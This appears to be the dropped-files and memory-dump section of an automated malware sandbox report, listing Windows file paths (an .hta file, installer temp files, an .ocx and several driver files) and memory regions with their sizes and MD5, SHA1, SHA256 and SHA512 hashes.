fb4b5800e5dd14f56bee0028ca97161a7c3c3cea6014c4f9a26173fbda23f8ae7dbc6e894bcc379ad8e76910b623c61af98b9d3f75b65e5a095b88f0dcf94358

Download Submit
C:\Users\Admin\AppData\Local\Temp\NzEdGm0aG.hta

Filesize
717B

MD5
123702f91bfe88b5782eb6c49b9cb57d

SHA1
4dfb3a646044376ff32fabc974c9b8d41d2adf08

SHA256
8d0f34478ac54e081fc204e133d9d8f23d1ad5901ac1a51a99a9b73fa87a7799

SHA512
4f0a51d037ac26c0b3da5ba6be0f7be32f4b79a593e876e5c2ee3b4cbeee1fd2bd3c245282a73a135e51c6a454775250d15ad3eb30d669a7246f9a102d3db93f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_flt1rrzv.nwj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\etmpA523D092-80DC-0944-9A8A-5CBF567B5846

Filesize
71KB

MD5
53faa139133525d1420a3867124154ff

SHA1
f7da2d43e311a3de6837dcc562ddaeefd745ff73

SHA256
bf0fbfe39dfe184530168aedc747510989e986a3e77a3a067627513afef679fd

SHA512
4e6db0c97fab52c9500ece44565ab226da0fa011356f877f70285dad50321a4ef4c18d7c868e4558578fb5e3af1ecee63b542f98979bc44507f8de7bf28865da

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-CHAGM.tmp\_isetup\_shfoldr.dll

Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-NJGEH.tmp\Bell_Setup16.tmp

Filesize
1.4MB

MD5
68f080515fa8925d53e16820ce5c9488

SHA1
ff5a1cc48e0dcfed469e6a5e8a07cb643f58170a

SHA256
038f72a66df8456befeacc89394c29f74e1ea043812f66191fd9f0c28b035975

SHA512
f44cb0650668cfd1e1c71c968837fef42a0a07cb694cf4a7ff2cc5bdbaece319f625ae558c5ddd1990fd34ecf2cecda1f6a77687499b62c91cf9ebb2e2188a67

Download Submit
C:\Users\Admin\AppData\Local\Temp\{5d177761-967f-4308-99f5-2b97bcf67928}\KVRT.exe

Filesize
2.6MB

MD5
3fb0ad61548021bea60cdb1e1145ed2c

SHA1
c9b1b765249bfd76573546e92287245127a06e47

SHA256
5d1a788260891c317f9d05b3387e732af908959c5ad4f5a84e7984bee71084f1

SHA512
38269c22fda1fdee5906c2bfdfc19b77b5f6d8da2be939c6d8259b536912f8bc6f261f5c508f47ade8ab591a54aafbfbcc302219820bad19feb78fcc3586d331

Download Submit
C:\Users\Admin\AppData\Local\Temp\{5d177761-967f-4308-99f5-2b97bcf67928}\PERSIS~1.DB-

Filesize
48KB

MD5
ace798a8d03993cf8f7453ecd8b2ca42

SHA1
701a088a2f8438caeab2916935aaa2640f77be9b

SHA256
8a6811b4d943039b8a82b1ec70bf7f498b158b0144e76f8f159c108ec0ed2ba3

SHA512
4325bb3c09cac9da3137d56bc6e00e3ddc622a03d24ac9ed9a473da432c216f7288ec601ba3d4972a8dbc0b2776a556632b0dcd89469e0d1ce5c9208a7517bcb

Download Submit
C:\Users\Admin\AppData\Roaming\1wlanapi.ocx

Filesize
5.0MB

MD5
06f34c0c9aacc414c5c438031a8b21ec

SHA1
e2f2c0d7399283fa637cbbf490368509f475d0b7

SHA256
95d9217b08738b2bbd0d0c9eec7d3a3ccf574a81968e071b85571b86c64cdbce

SHA512
3935e1f59abe025f231120dfbb43ea52dc41a59361fc9f3b7df41d083062cff588b5f7425327bec92e349cb5b7f691db88f7e113ec6c953c2018b7246c5fb0a9

Download Submit
C:\Windows\System32\drivers\b296ad91.sys

Filesize
368KB

MD5
990442d764ff1262c0b7be1e3088b6d3

SHA1
0b161374074ef2acc101ed23204da00a0acaa86e

SHA256
6c7ccd465090354438b39da8430a5c47e7f24768a5b12ee02fecf8763e77c9e4

SHA512
af3c6dfe32266a9d546f13559dcba7c075d074bdfdaf0e6bf2a8cae787008afa579f0d5f90e0c657dd614bb244a6d95ff8366c14b388e1f4a3ab76cccb23add4

Download Submit
C:\Windows\System32\drivers\klupd_b296ad91a_klark.sys

Filesize
355KB

MD5
9cfe1ced0752035a26677843c0cbb4e3

SHA1
e8833ac499b41beb6763a684ba60333cdf955918

SHA256
3bdb393dfaa63b9650658d9288a1dc9a62acc0d44c2f5eab9170485356b9b634

SHA512
29e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c

Download Submit
C:\Windows\System32\drivers\klupd_b296ad91a_klbg.sys

Filesize
199KB

MD5
424b93cb92e15e3f41e3dd01a6a8e9cc

SHA1
2897ab04f69a92218bfac78f085456f98a18bdd3

SHA256
ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e

SHA512
15e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f

Download Submit
C:\Windows\System32\drivers\klupd_b296ad91a_mark.sys

Filesize
260KB

MD5
66522d67917b7994ddfb5647f1c3472e

SHA1
f341b9b28ca7ac21740d4a7d20e4477dba451139

SHA256
5da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1

SHA512
921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968

Download Submit
memory/224-568-0x000000006FE50000-0x000000006FE9C000-memory.dmp

Filesize
304KB

Download
memory/776-416-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/776-433-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/844-136-0x0000000000860000-0x0000000000D12000-memory.dmp

Filesize
4.7MB

Download
memory/844-147-0x0000000000860000-0x0000000000D12000-memory.dmp

Filesize
4.7MB

Download
memory/1044-300-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/1044-301-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/1272-608-0x000000006E8F0000-0x000000006EDFE000-memory.dmp

Filesize
5.1MB

Download
memory/1424-629-0x0000000000840000-0x00000000009C8000-memory.dmp

Filesize
1.5MB

Download
memory/1424-448-0x0000000000400000-0x000000000056C000-memory.dmp

Filesize
1.4MB

Download
memory/1424-627-0x0000000000840000-0x00000000009C8000-memory.dmp

Filesize
1.5MB

Download
memory/1424-624-0x0000000000840000-0x00000000009C8000-memory.dmp

Filesize
1.5MB

Download
memory/1424-622-0x0000000000840000-0x00000000009C8000-memory.dmp

Filesize
1.5MB

Download
memory/1424-620-0x0000000000840000-0x00000000009C8000-memory.dmp

Filesize
1.5MB

Download
memory/1424-619-0x0000000000840000-0x00000000009C8000-memory.dmp

Filesize
1.5MB

Download
memory/1424-625-0x0000000000840000-0x00000000009C8000-memory.dmp

Filesize
1.5MB

Download
memory/1424-616-0x0000000140000000-0x0000000140447000-memory.dmp

Filesize
4.3MB

Download
memory/1424-628-0x0000000000840000-0x00000000009C8000-memory.dmp

Filesize
1.5MB

Download
memory/1424-626-0x0000000000840000-0x00000000009C8000-memory.dmp

Filesize
1.5MB

Download
memory/1424-623-0x0000000000840000-0x00000000009C8000-memory.dmp

Filesize
1.5MB

Download
memory/1424-618-0x0000000000840000-0x00000000009C8000-memory.dmp

Filesize
1.5MB

Download
memory/1424-621-0x0000000000840000-0x00000000009C8000-memory.dmp

Filesize
1.5MB

Download
memory/2652-34858-0x0000000000860000-0x0000000000D12000-memory.dmp

Filesize
4.7MB

Download
memory/2652-34864-0x0000000000860000-0x0000000000D12000-memory.dmp

Filesize
4.7MB

Download
memory/2664-135-0x0000000000400000-0x00000000008C2000-memory.dmp

Filesize
4.8MB

Download
memory/2664-78-0x0000000000400000-0x00000000008C2000-memory.dmp

Filesize
4.8MB

Download
memory/2664-284-0x0000000000400000-0x00000000008C2000-memory.dmp

Filesize
4.8MB

Download
memory/2664-80-0x0000000000400000-0x00000000008C2000-memory.dmp

Filesize
4.8MB

Download
memory/2664-475-0x0000000000400000-0x00000000008C2000-memory.dmp

Filesize
4.8MB

Download
memory/2664-225-0x0000000000400000-0x00000000008C2000-memory.dmp

Filesize
4.8MB

Download
memory/2664-349-0x0000000000400000-0x00000000008C2000-memory.dmp

Filesize
4.8MB

Download
memory/2816-431-0x0000000000400000-0x000000000056C000-memory.dmp

Filesize
1.4MB

Download
memory/2944-20-0x0000000006E60000-0x0000000006E7A000-memory.dmp

Filesize
104KB

Download
memory/2944-5-0x0000000006270000-0x00000000062D6000-memory.dmp

Filesize
408KB

Download
memory/2944-285-0x00000000006B0000-0x0000000000B7F000-memory.dmp

Filesize
4.8MB

Download
memory/2944-18-0x0000000006960000-0x00000000069AC000-memory.dmp

Filesize
304KB

Download
memory/2944-19-0x0000000008070000-0x00000000086EA000-memory.dmp

Filesize
6.5MB

Download
memory/2944-16-0x0000000006350000-0x00000000066A4000-memory.dmp

Filesize
3.3MB

Download
memory/2944-6-0x00000000062E0000-0x0000000006346000-memory.dmp

Filesize
408KB

Download
memory/2944-17-0x0000000006920000-0x000000000693E000-memory.dmp

Filesize
120KB

Download
memory/2944-4-0x0000000005970000-0x0000000005992000-memory.dmp

Filesize
136KB

Download
memory/2944-22-0x0000000007E10000-0x0000000007EA6000-memory.dmp

Filesize
600KB

Download
memory/2944-3-0x0000000005B40000-0x0000000006168000-memory.dmp

Filesize
6.2MB

Download
memory/2944-2-0x0000000005380000-0x00000000053B6000-memory.dmp

Filesize
216KB

Download
memory/2944-23-0x0000000007DA0000-0x0000000007DC2000-memory.dmp

Filesize
136KB

Download
memory/2944-24-0x0000000008CA0000-0x0000000009244000-memory.dmp

Filesize
5.6MB

Download
memory/2944-268-0x00000000006B0000-0x0000000000B7F000-memory.dmp

Filesize
4.8MB

Download
memory/3136-346-0x00000000000B0000-0x000000000057F000-memory.dmp

Filesize
4.8MB

Download
memory/3136-348-0x00000000000B0000-0x000000000057F000-memory.dmp

Filesize
4.8MB

Download
memory/3248-47-0x0000000000B10000-0x0000000000FC2000-memory.dmp

Filesize
4.7MB

Download
memory/3248-32-0x0000000000B10000-0x0000000000FC2000-memory.dmp

Filesize
4.7MB

Download
memory/3508-477-0x0000000000400000-0x00000000008C2000-memory.dmp

Filesize
4.8MB

Download
memory/3508-405-0x0000000000400000-0x00000000008C2000-memory.dmp

Filesize
4.8MB

Download
memory/3508-397-0x0000000000400000-0x00000000008C2000-memory.dmp

Filesize
4.8MB

Download
memory/3712-429-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/3712-450-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/4340-556-0x000001EDE6520000-0x000001EDE6528000-memory.dmp

Filesize
32KB

Download
memory/4340-554-0x000001EDE6530000-0x000001EDE654C000-memory.dmp

Filesize
112KB

Download
memory/4340-533-0x000001EDE6140000-0x000001EDE6162000-memory.dmp

Filesize
136KB

Download
memory/4340-555-0x000001EDE6510000-0x000001EDE651A000-memory.dmp

Filesize
40KB

Download
memory/4340-557-0x000001EDE6690000-0x000001EDE669A000-memory.dmp

Filesize
40KB

Download
memory/4676-473-0x0000000007630000-0x00000000076D3000-memory.dmp

Filesize
652KB

Download
memory/4676-474-0x0000000007940000-0x0000000007951000-memory.dmp

Filesize
68KB

Download
memory/4676-463-0x000000006FE50000-0x000000006FE9C000-memory.dmp

Filesize
304KB

Download
memory/4920-380-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/4920-381-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/5052-531-0x000001A6BAE70000-0x000001A6BAEE1000-memory.dmp

Filesize
452KB

Download
memory/5052-532-0x000001A6BAE70000-0x000001A6BAEE1000-memory.dmp

Filesize
452KB

Download
memory/5052-522-0x0000000000300000-0x0000000000302000-memory.dmp

Filesize
8KB

Download
memory/5052-523-0x000001A6BAE70000-0x000001A6BAEE1000-memory.dmp

Filesize
452KB

Download
memory/5052-530-0x000001A6BAE70000-0x000001A6BAEE1000-memory.dmp

Filesize
452KB

Download
memory/5408-178-0x000000000C780000-0x000000000C78A000-memory.dmp

Filesize
40KB

Download
memory/5408-182-0x000000000CD80000-0x000000000CF42000-memory.dmp

Filesize
1.8MB

Download
memory/5408-109-0x0000000007400000-0x00000000074F8000-memory.dmp

Filesize
992KB

Download
memory/5408-177-0x000000000C5F0000-0x000000000C60A000-memory.dmp

Filesize
104KB

Download
memory/5408-180-0x000000000C8D0000-0x000000000C920000-memory.dmp

Filesize
320KB

Download
memory/5408-98-0x0000000005800000-0x0000000005B54000-memory.dmp

Filesize
3.3MB

Download
memory/5408-104-0x0000000005DF0000-0x0000000005E3C000-memory.dmp

Filesize
304KB

Download
memory/5408-181-0x000000000C9E0000-0x000000000CA92000-memory.dmp

Filesize
712KB

Download
memory/5408-107-0x0000000007110000-0x00000000071A2000-memory.dmp

Filesize
584KB

Download
memory/5408-108-0x0000000000C00000-0x0000000000C08000-memory.dmp

Filesize
32KB

Download
memory/5408-183-0x000000000CF50000-0x000000000CF9E000-memory.dmp

Filesize
312KB

Download
memory/5408-175-0x000000000C4A0000-0x000000000C5F4000-memory.dmp

Filesize
1.3MB

Download
memory/5420-519-0x0000000000400000-0x000000000068D000-memory.dmp

Filesize
2.6MB

Download
memory/5424-372-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/5424-371-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/5784-489-0x000000006FE50000-0x000000006FE9C000-memory.dmp

Filesize
304KB

Download
memory/5784-518-0x00000000074C0000-0x00000000074D1000-memory.dmp

Filesize
68KB

Download
memory/5948-316-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/5948-317-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/5992-395-0x0000000000860000-0x0000000000D12000-memory.dmp

Filesize
4.7MB

Download
memory/5992-48-0x0000000000860000-0x0000000000D12000-memory.dmp

Filesize
4.7MB

Download
memory/5992-318-0x0000000000860000-0x0000000000D12000-memory.dmp

Filesize
4.7MB

Download
memory/5992-63-0x0000000000860000-0x0000000000D12000-memory.dmp

Filesize
4.7MB

Download
memory/5992-64-0x0000000000860000-0x0000000000D12000-memory.dmp

Filesize
4.7MB

Download
memory/5992-253-0x0000000000860000-0x0000000000D12000-memory.dmp

Filesize
4.7MB

Download
memory/5992-105-0x0000000000860000-0x0000000000D12000-memory.dmp

Filesize
4.7MB

Download
memory/5992-204-0x0000000000860000-0x0000000000D12000-memory.dmp

Filesize
4.7MB

Download
memory/5992-581-0x0000000000860000-0x0000000000D12000-memory.dmp

Filesize
4.7MB

Download
memory/6080-166-0x0000000007060000-0x0000000007074000-memory.dmp

Filesize
80KB

Download
memory/6080-131-0x0000000006010000-0x000000000602E000-memory.dmp

Filesize
120KB

Download
memory/6080-168-0x00000000070C0000-0x00000000070DA000-memory.dmp

Filesize
104KB

Download
memory/6080-170-0x00000000070B0000-0x00000000070B8000-memory.dmp

Filesize
32KB

Download
memory/6080-164-0x0000000007040000-0x000000000704E000-memory.dmp

Filesize
56KB

Download
memory/6080-144-0x0000000007010000-0x0000000007021000-memory.dmp

Filesize
68KB

Download
memory/6080-120-0x0000000005FA0000-0x0000000005FD2000-memory.dmp

Filesize
200KB

Download
memory/6080-121-0x000000006FE50000-0x000000006FE9C000-memory.dmp

Filesize
304KB

Download
memory/6080-133-0x0000000006E60000-0x0000000006E6A000-memory.dmp

Filesize
40KB

Download
memory/6080-132-0x0000000006D10000-0x0000000006DB3000-memory.dmp

Filesize
652KB

Download
memory/8108-34700-0x000000006FE50000-0x000000006FE9C000-memory.dmp

Filesize
304KB

Download
memory/8108-34710-0x0000000006FF0000-0x0000000007093000-memory.dmp

Filesize
652KB

Download
memory/8108-34735-0x0000000007470000-0x0000000007481000-memory.dmp

Filesize
68KB

Download
memory/8400-34225-0x0000000007690000-0x00000000076A4000-memory.dmp

Filesize
80KB

Download
memory/8400-34222-0x0000000007630000-0x0000000007641000-memory.dmp

Filesize
68KB

Download
memory/8400-34221-0x00000000072E0000-0x0000000007383000-memory.dmp

Filesize
652KB

Download
memory/8400-34211-0x000000006FE50000-0x000000006FE9C000-memory.dmp

Filesize
304KB

Download
memory/13252-34036-0x0000000000860000-0x0000000000D12000-memory.dmp

Filesize
4.7MB

Download
memory/13252-34038-0x0000000000860000-0x0000000000D12000-memory.dmp

Filesize
4.7MB

Download